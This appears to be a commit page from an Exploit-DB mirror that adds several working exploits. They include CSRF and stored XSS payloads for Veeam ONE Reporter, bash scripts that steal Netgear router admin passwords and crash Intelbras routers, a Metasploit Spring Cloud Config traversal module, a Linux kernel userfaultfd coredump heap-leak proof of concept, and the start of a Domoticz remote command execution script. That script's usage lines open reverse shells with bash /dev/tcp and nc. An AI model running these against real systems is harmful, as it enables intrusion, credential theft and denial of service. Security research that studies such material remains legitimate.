bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-05-01

Browse source 
23 changes to exploits/shellcodes

SpotAuditor 3.6.7 - Denial of Service (PoC)
SpotAuditor 3.6.7 - 'Base64 Encrypted Password' Denial of Service (PoC)
SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)
Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification

IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter)
IP-Tools 2.5 - 'Log to file' Local Buffer Overflow (SEH) (Egghunter)

DeviceViewer 3.12.0.1 - 'user' SEH Overflow
Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow
Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow
Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit)
AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)
Pimcore < 5.71 - Unserialize RCE (Metasploit)
Netgear DGN2200 / DGND3700 - Admin Password Disclosure
Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting
Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget)
Intelbras IWR 3000N - Denial of Service (Remote Reboot)
Joomla! Component ARI Quiz 3.7.4 - SQL Injection
Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery
HumHub 1.3.12 - Cross-Site Scripting
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)
Domoticz 4.10577 - Unauthenticated Remote Command Execution
Joomla! Component JiFile 2.3.1 - Arbitrary File Download
Hyvikk Fleet Manager - Shell Upload
Agent Tesla Botnet - Information Disclosure
Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
This commit is contained in:
Offensive Security 2019-05-01 05:02:01 +00:00
parent be3b22b6f7
commit f3c28b3d62
24 changed files with 2177 additions and 30 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

183
exploits/ashx/webapps/46765.txt Normal file
View file

@ -0,0 +1,183 @@
# Exploit Title: Veeam ONE Reporter - Cross-Site Request Forgery (All Actions/Methods)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Date: 2019-04-27
# Google Dork: N/A
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016
#exploit:
<form id='del' method='POST' action='https://[target_URL]:1239/CommonDataHandlerReadOnly.ashx'>
<input name='f' id='dd'>
</form>
<script>
document.getElementById("dd").value= JSON.stringify({
id: '1',
method: 'deleteDashboard',
params:{ 'id' : 21}
});
document.getElementById("del").submit();
</script>
##########################################
#all methods is vulnerable
##########################################
#addDashboard(p)
#addDashboardUser(par)
#addDashboardUserList(par)
#applySchedulingForDashboard(dashboardId, taskId, config)
#applySchedulingForFolder(folderId, taskId, config)
#applySchedulingForReport(reportId, taskId, vmr, config)
#canModifyDashboard(id)
#captureContainer(data, taskId)
#changeObjectVisibility(objectId, visible)
#checkForUpdateReportPack(confirm)
#checkIfAdmin()
#checkUserPermissionsResolved(o)
#checkWinVersion()
#clearContainer()
#connectToSqlServer(data, save)
#DBExecuteProcedure(db)
#DBStoreLoad(db)
#DBStoreSave(db)
#deleteDashboard(id)
#deleteDashboardImage(imageId)
#deleteDashboardWidget(p)
#DeleteFolder(param)
#deleteReportPack(name, id, type)
#deleteTask(id)
#doLogin(domain, login, password)
#editDashboard(p)
#emptyDashboardRecycleBin(o)
#findDashboardUsers(p)
#getAboutData()
#getActionParameters()
#getAdvancedData()
#getAlarms()
#getAllSchedulingsForDashboard(info)
#getAllSchedulingsForFolder(info)
#getAllSchedulingsForReport(info)
#getBackUpTree(wsj)
#getBusinessViewTree(wsj)
#getComboData()
#getCommonGridItem()
#getConfiguration()
#getConfigurationOverview(id)
#getConnectedServersGridItem()
#getDashboardData(dashboard_id)
#getDashboardImages(p)
#getDashboardPermissions(p)
#getDashboardPredefiniedReports(p)
#getDashboards(p)
#getDashboardSSRSChartTypes(p)
#getDashboardUserList(p)
#getDashboardWidgetTypeData(p)
#getDefaultUserName()
#getDeletedDashboards(p)
#getEnumeratingTaskContainers(id)
#getEnumeratingTaskProperties(id)
#getEnumeratingTaskScheduling(id)
#getExtensionModules(p)
#getIgnoredDatastores(p)
#getIgnoredDatastoresDetails(p)
#getInfrastructureTree(wsj)
#getIsReporterFreeVersion()
#getJobData(id)
#getLicenseData()
#getLicensedHVSockets(p)
#getLicensedVMSockets(p)
#getMetadata(query, reload)
#getNeedToDisableTabs()
#getNotificationData()
#getObjectsToHide(p)
#getOptionList()
#getReportFilters(param)
#getReportImageName()
#getReportListTreeCheckbox(wsj)
#getReportListTreeDashboard(wsj)
#getReportListTreeWorkspace(wsj)
#getReportManagementTree(wsj)
#getReportsSectionsTree(wsj)
#getReportStatistics(param)
#getScheduleDashboardConfig(dashboardId, taskId)
#getScheduleFolderConfig(folderId, taskId)
#getScheduleReportConfig(reportId, taskId, packType)
#getScriptArgumentList()
#getServerScopeAll(wsj)
#getSessionDetails(idwithtype)
#getSessions(p)
#getSessionsTaskTypes(p)
#getSiteStatusGridItem()
#getSmtpServerData()
#getSqlServerData()
#getSsrsServerData()
#getSSRSStatus()
#getStartStopDeleteButtonsEnabled(id)
#getStatistics()
#getTaskList(p)
#getUpdateSessionInfo(o)
#getvCloudList(p)
#getVideoReportData(interval, intervalPeriod, scope)
#getVmStatus()
#getWidgetCustomChartConstructorData(p)
#getWidgetData(r)
#getWidgetList(item)
#getWidgetPackList(j)
#getWidgetParams(uid)
#getWorkspace()
#getWorkspaceReportGridItems(param)
#isSmtpConfigured()
#publishDashboard(id, publish)
#recalculateProjects(ids)
#removeDashboardUser(par)
#resetReportImageName()
#resetSchedulingForDashboard(dashboardId, taskId)
#resetSchedulingForDashboardArray(dashboardId, taskId)
#resetSchedulingForFolder(folderId)
#resetSchedulingForReport(reportId, vmr)
#resetSchedulingTaskForFolder(folderId, taskId)
#resetSchedulingTaskForReport(reportId, taskId, vmr)
#resetSchedulingTasksForFolderArray(folderId, taskId)
#resetSchedulingTasksForReportArray(reportId, taskId, vmr)
#restoreDashboard(p)
#revokeHost(hostName)
#revokeHostHV(hostName)
#SaveFolder(param)
#saveIgnoredDatastores(taskContainerId, dataStores)
#saveSchedulingInfo(taskId, taskProp)
#saveTask(taskProp, taskContainers, excludes)
#sendNotificationAboutDashboardSharing(to, subject, dashboardName, dashboardUrl, permissionLevel)
#sendTestMessage(data, setting)
#setAdvancedData(measure)
#setComboData(data)
#setDashboardUserPermissions(par)
#setDashboardWidget(p)
#SetDragAndDropPosition(dwid, colIndex, position, height)
#setSchedulingEnability(dashboardId, taskId, disabled)
#setSchedulingEnabilityArray(dashboardId, taskId, disabled)
#setSchedulingEnabilityForFolder(folderId, taskId, disabled)
#setSchedulingEnabilityForFolderArray(folderId, taskId, disabled)
#setSchedulingEnabilityForReport(reportId, taskId, disabled)
#setSchedulingEnabilityForReportArray(reportId, taskId, disabled)
#setSmtpServerData(data)
#setSsrsServerData(data)
#startTask(id)
#stopTask(id)
#system.about()
# Returns a summary about the server implementation for display purposes.
#system.listMethods()
# Returns an array of method names implemented by this service.
#system.version()
# Returns the version server implementation using the major, minor, build and revision format.
#testServer(tcd)
#testSsrsConnection(data)
#updateDashboardPosition(p)
#updateTreeExpandedStates(wsj, a)
#validateTaskName(tcd, id)
##########################################

18
exploits/ashx/webapps/46766.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Stored XSS)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Date: 2019-04-27
# Google Dork: N/A
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016
#exploit:
Path: /CommonDataHandlerReadOnly.ashx
method: addDashboard / editDashboard
SET Description(config) field to “AAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>”

18
exploits/ashx/webapps/46767.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Add/Edit Widget)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Date: 2019-04-27
# Google Dork: N/A
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016
#exploit:
Path: /CommonDataHandlerReadOnly.ashx
method: setDashboardWidget
SET Caption field to “AAAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>”

29
exploits/hardware/webapps/46764.sh Executable file
View file

@ -0,0 +1,29 @@
#/bin/bash
# PoC based on CVE-2016-5649 created by Social Engineering Neo.
#
# Long Method: https://www.youtube.com/watch?v=f3awG0XPKAs
#
# https://www.shodan.io/search?query=DGN2200 = 2,325 possible vulnerable devices.
# https://www.shodan.io/search?query=DGND3700 = 555 possible vulnerable devices.
#
# A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication.
# When the request is processed, it exposes the administrator password in clear text before getting redirected to 'absw_vfysucc.cgia'.
# An attacker can use this password to gain administrator access of the targeted routers web interface.
#
# Netgear has released firmware version 1.0.0.52 for DGN2200 & 1.0.0.28 for DGND3700 to address this issue.
clear
read -p "Enter Target Address Followed by Port: " target port # localhost 8080
if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' $target:$port/BSW_cxttongr.htm)
pass=$(echo $grab | awk '{print $218}' | tail -c +2 | head -c -3)
if [ "$pass" == '' ] || [ "$pass" == '/html' ] ; then
echo Invalid Response, Target May Not be Vulnerable.
else
echo The Password for: $target is: $pass
fi
else
echo "Incorrect Port."
fi

36
exploits/hardware/webapps/46768.sh Executable file
View file

@ -0,0 +1,36 @@
#/bin/bash
# PoC based on CVE-2019-11415 created by Social Engineering Neo.
#
# Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/
#
# A malformed login request allows remote attackers to cause a denial of service (reboot), as demonstrated by JSON misparsing of the \""} string to v1/system/login.
#
# Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.
clear
read -p "Enter Target Address Followed by Port: " target port # localhost 8080
alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Target May be Offline or Blocking ICMP requests.
read -p "Would you Like to Proceed? (Y/n): " ans
if [ "$ans" = 'n' ] || [ "$ans" = 'N' ]; then
clear
exit
fi
fi
if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' --compressed --data-binary '\""}' $target:$port/v1/system/login)
else
echo "Incorrect Port."
fi
clear
alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Router Successfully Taken Offline. #NOTE: if router blocks ICMP requests this may be inaccurate.
else
echo Exploit Unsuccessfull, Target May Not be Vulnerable.
fi

35
exploits/hardware/webapps/46770.html Normal file
View file

@ -0,0 +1,35 @@
<!--
PoC based on CVE-2019-11416 created by Social Engineering Neo.
Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-1-5-0-csrf-lead-to-router-takeover/
Due to inexistent authorization on router API on authenticated IP addresses, an attacker can use this weak spot to change router configurations and take the current administrator password.
Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.
-->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>IWR 3000N - CSRF on authenticated administrator</title>
</head>
<body>
<button onclick="exploit()">Exploit!</button>
<p>Click the button to get the login and password.</p>
<script>
function exploit(){
$.get( "http://localhost:80/v1/system/user" )
.done(( data ) => {
alert( data );
})
.fail(function( err, status) {
alert( status );
});
}
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
</body>
</html>

74
exploits/java/webapps/46772.rb Executable file
View file

@ -0,0 +1,74 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Spring Cloud Config Server Directory Traversal',
'Description' => %q{
This module exploits an unauthenticated directory traversal
vulnerability
which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,
versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
Spring
Cloud Config listens by default on port 8888.
},
'References' =>
[
['CVE', '2019-3799'],
['URL', 'https://pivotal.io/security/cve-2019-3799']
],
'Author' =>
[
'Vern', # Vulnerability discovery
'Dhiraj Mishra' # Metasploit module
],
'DisclosureDate' => '2019-04-17',
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(8888),
OptString.new('FILEPATH', [true, "The path to the file to read",
'/etc/passwd']),
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
])
end
def data
Rex::Text.rand_text_alpha(3..8)
end
def run_host(ip)
filename = datastore['FILEPATH']
traversal = "#{"..%252F" * datastore['DEPTH']}#{filename}"
uri = "/#{data}/#{data}/master/#{traversal}"
res = send_request_raw({
'method' => 'GET',
'uri' => uri
})
unless res && res.code == 200
print_error('Nothing was downloaded')
return
end
vprint_good("#{peer} - #{res.body}")
path = store_loot(
'springcloud.traversal',
'text/plain',
ip,
res.body,
filename
)
print_good("File saved in: #{path}")
end
end

293
exploits/linux/dos/46781.txt Normal file
View file

@ -0,0 +1,293 @@
elf_core_dump() has a comment back from something like 2.5.43-C3 that says:
/*
* We no longer stop all VM operations.
*
* This is because those proceses that could possibly change map_count
* or the mmap / vma pages are now blocked in do_exit on current
* finishing this core dump.
*
* Only ptrace can touch these memory addresses, but it doesn't change
* the map_count or the pages allocated. So no possibility of crashing
* exists while dumping the mm->vm_next areas to the core file.
*/
However, since commit 86039bd3b4e6 ("userfaultfd: add new syscall to provide
memory externalization", introduced in v4.3), that's no longer true; the
following functions can call vma_merge() on another task's VMAs while holding
the corresponding mmap_sem for writing:
- userfaultfd_release() [->release handler]
- userfaultfd_register() [invoked via ->unlocked_ioctl handler]
- userfaultfd_unregister() [invoked via ->unlocked_ioctl handler]
This means that VMAs can disappear from under elf_core_dump().
I see two potential ways to fix this, but I'm not sure whether either of them is
good:
1. Let elf_core_dump() hold a read lock on the mmap_sem across the page-dumping
loop. This would mean that the mmap_sem can be blocked indefinitely by a
userspace process, and e.g. userfaultfd_release() could block the task or
global workqueue it's running on (depending on where the final fput()
happened) indefinitely, which seems potentially bad from a denial-of-service
perspective?
2. Let coredump_wait() set a flag on the mm_struct before dropping the mmap_sem
that says "this mm_struct is going away, keep your hands off";
let the userfaultfd ioctl handlers check for the flag and bail out as if the
mm_struct was already dead;
hack userfaultfd_release() so that it only calls vma_merge() if the flag
hasn't been set;
and because I feel icky about concurrent reads and writes of bitmasks without
explicit annotations, either make the vm_flags accesses in
userfaultfd_release() and in everything called from elf_core_dump() atomic
(because userfaultfd_release will clear bits in them concurrently with reads
from elf_core_dump()) or let elf_core_dump() take the mmap_sem for reading
while looking at vm_flags.
If the fix goes in this direction, it should probably come with a big warning
on top of the definition of mmap_sem, or something like that.
Here's a simple proof-of-concept:
======================================================================
user@debian:~/uffd_coredump$ cat coredump_helper.c
#include <unistd.h>
#include <stdlib.h>
#include <err.h>
#include <stdbool.h>
int main(void) {
char buf[1024];
size_t total = 0;
bool slept = false;
while (1) {
int res = read(0, buf, sizeof(buf));
if (res == -1) err(1, "read");
if (res == 0) return 0;
total += res;
if (total > 1024*1024 && !slept) {
sleep(10);
slept = true;
}
}
}
user@debian:~/uffd_coredump$ gcc -o coredump_helper coredump_helper.c
user@debian:~/uffd_coredump$ cat set_helper.sh
#!/bin/sh
echo "|$(realpath ./coredump_helper)" > /proc/sys/kernel/core_pattern
user@debian:~/uffd_coredump$ sudo ./set_helper.sh
user@debian:~/uffd_coredump$ cat dumpme.c
#define _GNU_SOURCE
#include <string.h>
#include <stdlib.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <err.h>
#include <unistd.h>
#include <sys/mman.h>
int main(void) {
// set up an area consisting of half normal anon memory, half present userfaultfd region
void *area = mmap(NULL, 1024*1024*2, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (area == MAP_FAILED) err(1, "mmap");
memset(area, 'A', 1024*1024*2);
int uffd = syscall(__NR_userfaultfd, 0);
if (uffd == -1) err(1, "userfaultfd");
struct uffdio_api api = { .api = 0xAA, .features = 0 };
if (ioctl(uffd, UFFDIO_API, &api)) err(1, "API");
struct uffdio_register reg = {
.range = { .start = (unsigned long)area+1024*1024, .len = 1024*1024 },
.mode = UFFDIO_REGISTER_MODE_MISSING
};
if (ioctl(uffd, UFFDIO_REGISTER, &reg)) err(1, "REGISTER");
// spawn a child that can do stuff with the userfaultfd
pid_t child = fork();
if (child == -1) err(1, "fork");
if (child == 0) {
sleep(3);
if (ioctl(uffd, UFFDIO_UNREGISTER, &reg.range)) err(1, "UNREGISTER");
exit(0);
}
*(volatile char *)0 = 42;
}
user@debian:~/uffd_coredump$ gcc -o dumpme dumpme.c
user@debian:~/uffd_coredump$ ./dumpme
Segmentation fault (core dumped)
user@debian:~/uffd_coredump$
======================================================================
dmesg output:
======================================================================
[ 128.977354] dumpme[1116]: segfault at 0 ip 0000563e14789a6e sp 00007ffed407cd80 error 6 in dumpme[563e14789000+1000]
[ 128.979600] Code: ff 85 c0 74 16 48 8d 35 d7 00 00 00 bf 01 00 00 00 b8 00 00 00 00 e8 c1 fc ff ff bf 00 00 00 00 e8 c7 fc ff ff b8 00 00 00 00 <c6> 00 2a b8 00 00 00 00 c9 c3 0f 1f 84 00 00 00 00 00 41 57 41 56
[ 138.988465] ==================================================================
[ 138.992696] BUG: KASAN: use-after-free in elf_core_dump+0x2063/0x20e0
[ 138.994168] Read of size 8 at addr ffff8881e616ed60 by task dumpme/1116
[ 138.996163] CPU: 1 PID: 1116 Comm: dumpme Not tainted 5.0.0-rc8 #292
[ 138.997591] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
[ 138.999570] Call Trace:
[ 139.000237] dump_stack+0x71/0xab
[...]
[ 139.001940] print_address_description+0x6a/0x2b0
[...]
[ 139.005026] kasan_report+0x14e/0x192
[...]
[ 139.006803] elf_core_dump+0x2063/0x20e0
[...]
[ 139.013876] do_coredump+0x1072/0x17a0
[...]
[ 139.027534] get_signal+0x93c/0xa90
[ 139.028400] do_signal+0x85/0xb20
[...]
[ 139.034068] exit_to_usermode_loop+0xfb/0x120
[...]
[ 139.036028] prepare_exit_to_usermode+0x95/0xb0
[ 139.037114] retint_user+0x8/0x8
[ 139.037884] RIP: 0033:0x563e14789a6e
[ 139.038661] Code: ff 85 c0 74 16 48 8d 35 d7 00 00 00 bf 01 00 00 00 b8 00 00 00 00 e8 c1 fc ff ff bf 00 00 00 00 e8 c7 fc ff ff b8 00 00 00 00 <c6> 00 2a b8 00 00 00 00 c9 c3 0f 1f 84 00 00 00 00 00 41 57 41 56
[ 139.042892] RSP: 002b:00007ffed407cd80 EFLAGS: 00010202
[ 139.044148] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00007f654198538b
[ 139.045809] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000001200011
[ 139.047405] RBP: 00007ffed407cdd0 R08: 00007f6541e6f700 R09: 00007ffed407cdae
[ 139.049063] R10: 00007f6541e6f9d0 R11: 0000000000000246 R12: 0000563e14789770
[ 139.050659] R13: 00007ffed407ceb0 R14: 0000000000000000 R15: 0000000000000000
[ 139.052673] Allocated by task 1116:
[ 139.053506] __kasan_kmalloc.constprop.9+0xa0/0xd0
[ 139.054600] kmem_cache_alloc+0xd6/0x1e0
[ 139.055561] vm_area_alloc+0x1b/0x80
[ 139.056339] mmap_region+0x4db/0xa60
[ 139.057179] do_mmap+0x44d/0x6f0
[ 139.057953] vm_mmap_pgoff+0x163/0x1b0
[ 139.058936] ksys_mmap_pgoff+0x16a/0x330
[ 139.059839] do_syscall_64+0x73/0x160
[ 139.060633] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 139.062270] Freed by task 1117:
[ 139.062957] __kasan_slab_free+0x130/0x180
[ 139.063906] kmem_cache_free+0x73/0x1c0
[ 139.064829] __vma_adjust+0x564/0xca0
[ 139.065756] vma_merge+0x358/0x6a0
[ 139.066504] userfaultfd_ioctl+0x687/0x17c0
[ 139.067533] do_vfs_ioctl+0x134/0x8f0
[ 139.068377] ksys_ioctl+0x70/0x80
[ 139.069141] __x64_sys_ioctl+0x3d/0x50
[ 139.069959] do_syscall_64+0x73/0x160
[ 139.070755] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 139.072235] The buggy address belongs to the object at ffff8881e616ed50
which belongs to the cache vm_area_struct of size 200
[ 139.075075] The buggy address is located 16 bytes inside of
200-byte region [ffff8881e616ed50, ffff8881e616ee18)
[ 139.077556] The buggy address belongs to the page:
[ 139.078648] page:ffffea0007985b00 count:1 mapcount:0 mapping:ffff8881eada6f00 index:0x0 compound_mapcount: 0
[ 139.080745] flags: 0x17fffc000010200(slab|head)
[ 139.081724] raw: 017fffc000010200 ffffea000792dc08 ffffea0007765c08 ffff8881eada6f00
[ 139.083477] raw: 0000000000000000 00000000001d001d 00000001ffffffff 0000000000000000
[ 139.085121] page dumped because: kasan: bad access detected
[ 139.086667] Memory state around the buggy address:
[ 139.087695] ffff8881e616ec00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 139.089294] ffff8881e616ec80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 139.090833] >ffff8881e616ed00: fc fc fc fc fc fc fc fc fc fc fb fb fb fb fb fb
[ 139.092417] ^
[ 139.093780] ffff8881e616ed80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 139.095318] ffff8881e616ee00: fb fb fb fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 139.096917] ==================================================================
[ 139.098460] Disabling lock debugging due to kernel taint
======================================================================
################################################################################
One thing that makes exploitation nice here is that concurrent modification of the number of VMAs throws off the use of the heap-allocated array `vma_filesz`: First vma_filesz is allocated with a size based on the number of VMAs, then it is filled by iterating over the VMAs and writing their calculated sizes into the array (without re-checking against the array's size), and then the function iterates over the VMAs again and dumps the entries in vma_filesz to userspace, again without checking whether the array bounds were exceeded.
This means that you can use this to:
- leak in-bounds uninitialized values
- leak out-of-bounds data
- write out-of-bounds data (with constraints on what can be written)
By using FUSE as source of file mappings and as coredump target (assuming that the system has the upstream default core_pattern), you can pause both the loop that performs out-of-bounds writes as well as the loop that performs out-of-bounds reads, so you should be able to abuse this to write in the middle of newly allocated objects if you want to.
The attached proof-of-concept just demonstrates how you can use this to leak kernel heap data because I didn't want to spend too much time on building a PoC for this.
Usage:
=========================================================================
user@deb10:~/uffd_core_memdump$ tar cf uffd_core_memdump_clean.tar
tar: Cowardly refusing to create an empty archive
Try 'tar --help' or 'tar --usage' for more information.
user@deb10:~/uffd_core_memdump$ tar cf uffd_core_memdump_clean.tar uffd_core_memdump_clean/
user@deb10:~/uffd_core_memdump$ cd uffd_core_memdump_clean/
user@deb10:~/uffd_core_memdump/uffd_core_memdump_clean$ ls
compile.sh slowfuse.c uffd_core_oob.c
user@deb10:~/uffd_core_memdump/uffd_core_memdump_clean$ ./compile.sh
user@deb10:~/uffd_core_memdump/uffd_core_memdump_clean$ ./uffd_core_oob
waiting for fuse...
fuse is up
got sync 1
wrote sync 2
########## getattr(/core)
########## getattr(/core)
######## create /core
########## getattr(/core)
########## getattr(/core)
starting tarpit
got sync 2
0x0000000000000e3c 0x0000000000000000 0x0000000000000000 0x0000000000001000
0x0000000000000000 0x0000000000000000 0x0000000000001000 0x0000000000001000
0x0000000000021000 0x0000000000001000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000004000 0x0000000000002000 0x0000000000004000
0x0000000000002000 0x0000000000001000 0x0000000000000000 0x0000000000000000
0x0000000000001000 0x0000000000001000 0x0000000000001000 0x0000000000021000
0x0000000000003000 0x0000000000002000 0xffff9d5e5d354020 0xffff9d5e5d354020
0x0000000000000000 0x0000000000000000 0x00007ffe113b5fe8 0x0000000000800000
0xffffffffffffffff 0xcbdddcafbd3ba9d1 0x0000000000000000 0x00000001003e0003
0x0000000000002c80 0x0000000000000040 0x0000000000006150 0x0038004000000000
0x001b001c00400009 0x0000000400000006 0x0000000000000040 0x0000000000000040
0x0000000000000040 0x00000000000001f8 0x00000000000001f8 0x0000000000000008
0x0000000400000003 0xffff9d5e39c7edd0 0x0000000000000000 0x0000000000000000
0x00007fffa1d9dc90 0x0000000000000001 0xffff9d5e421c1300 0x0000000000000000
0x0000000000000000 0x0000001100000003 0xffff9d5e5d352020 0xffff9d5e5d352020
0x0000000000000000 0x0000000000000000 0x00007fffa1d9efea 0x0000000000800000
0xffffffffffffffff 0xcbdddcafbd3bacd1 0x000000000000cccc 0x0000000000000000
0x000000000000cdcd 0x0000000000000000 0x000000000000cece 0x0000000000000000
0x000000000000cfcf 0x0000000000000000 0x000000000000d0d0 0x0000000000000000
0x000000000000d1d1 0x0000000000000000 0x000000000000d2d2 0x0000000000000000
0x000000000000d3d3 0x0000000000000000 0x000000000000d4d4 0x0000000000000000
0x000000000000d5d5 0x0000000000000000 0x000000000000d6d6 0x0000000000000000
0x000000000000d7d7 0x0000000000000000 0x000000000000d8d8 0x0000000000000000
0x000000000000d9d9 0x0000000000000000 0x000000000000dada 0x0000000000000000
0x000000000000dbdb 0xcbdddcafbd3ba2d1 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0xffff9d5e445b1860 0xffff9d5e445b1860 0x0000000000000000
0x0000000000000000 0xffffae0182101000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000180 0xffff9d5e445b18c8 0xffff9d5e445b18c8
0xffffffff90f80b40 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0xcbdddcafbd3ba9d1 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000 0xffff9d5e6699ccc0
0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000
[...]
0xffff9d5e445ebd58 0xffff9d5e445ebd58 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 0x0000000000000000 0xffff9d5e4978d080
0x0000000000000000 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0xffff9d5e5e180c60 0x0000000000000000 0xffff9d5e445ebdd0
0xffff9d5e445ebdd0 0xffff9d5e445ebde0 0xffff9d5e445ebde0 0xffff9d5e5d669430
0x0000000000000000 0x4cab9d3f81e3f812 0xffffffff91058c10 0xffff9d5e49614f20
0xffff9d5e5d406b40 0xffff9d5e5d40a328 0xffffffff91a2ae80 0x0000000000000000
0x0000000000000000 0x0008400000220000 0x0000000000000000 0x0000000000000000
0xffff9d5e445ebe58 0xffff9d5e445ebe58 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000
Segmentation fault (core dumped)
=========================================================================
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46781.zip

219
exploits/multiple/webapps/46773.py Executable file
View file

@ -0,0 +1,219 @@
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: Unauthenticated Remote Command Execution on Domoticz <= 4.10577
# Date: April 2019
# Exploit Author: Fabio Carretto @ Certimeter Group
# Vendor Homepage: https://www.domoticz.com/
# Software Link: https://www.domoticz.com/downloads/
# Version: Domoticz <= 4.10577
# Tested on: Debian 9
# CVE: CVE-2019-10664, CVE-2019-10678
# ====================================================================
# Bypass authentication, inject commands and execute them
# Required login page or no authentication (doesn't work with "Basic-Auth" setting)
# There are 3 injection modes. The 1st and the 2nd bypass the char filter:
# 1.Default mode insert the commands in a script and reply with it once to
# an HTTP request. Set address and port of the attacker host with -H and -P
# 2.(-zipcmd) a zip icon pack will be uploaded. The domoticz installation path
# can be optionally specified with -path /opt/domoti..
# 3.(-direct) commands executed directly. Characters like & pipe or redirection
# cannot be used. The execution may block domoticz web server until the end
# Examples:
# ./exploit.py -H 172.17.0.1 -P 2222 http://172.17.0.2:8080/ 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1 &'
# ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &'
import argparse
import requests
import urllib
import base64
import json
import BaseHTTPServer
import zipfile
import thread
# Retrieve data from db with the SQL Injection on the public route
def steal_dbdata(field):
sqlinj = sqlpref % field
urltmp = url_sqlinj + sqlinj
r = session.get(urltmp)
print '[+] %s: %s' % (field,r.text)
return r.text
# Login and return the SID cookie
def dologin(username, password):
url_login_cred = url_login % (username, password)
r = session.get(url_login_cred)
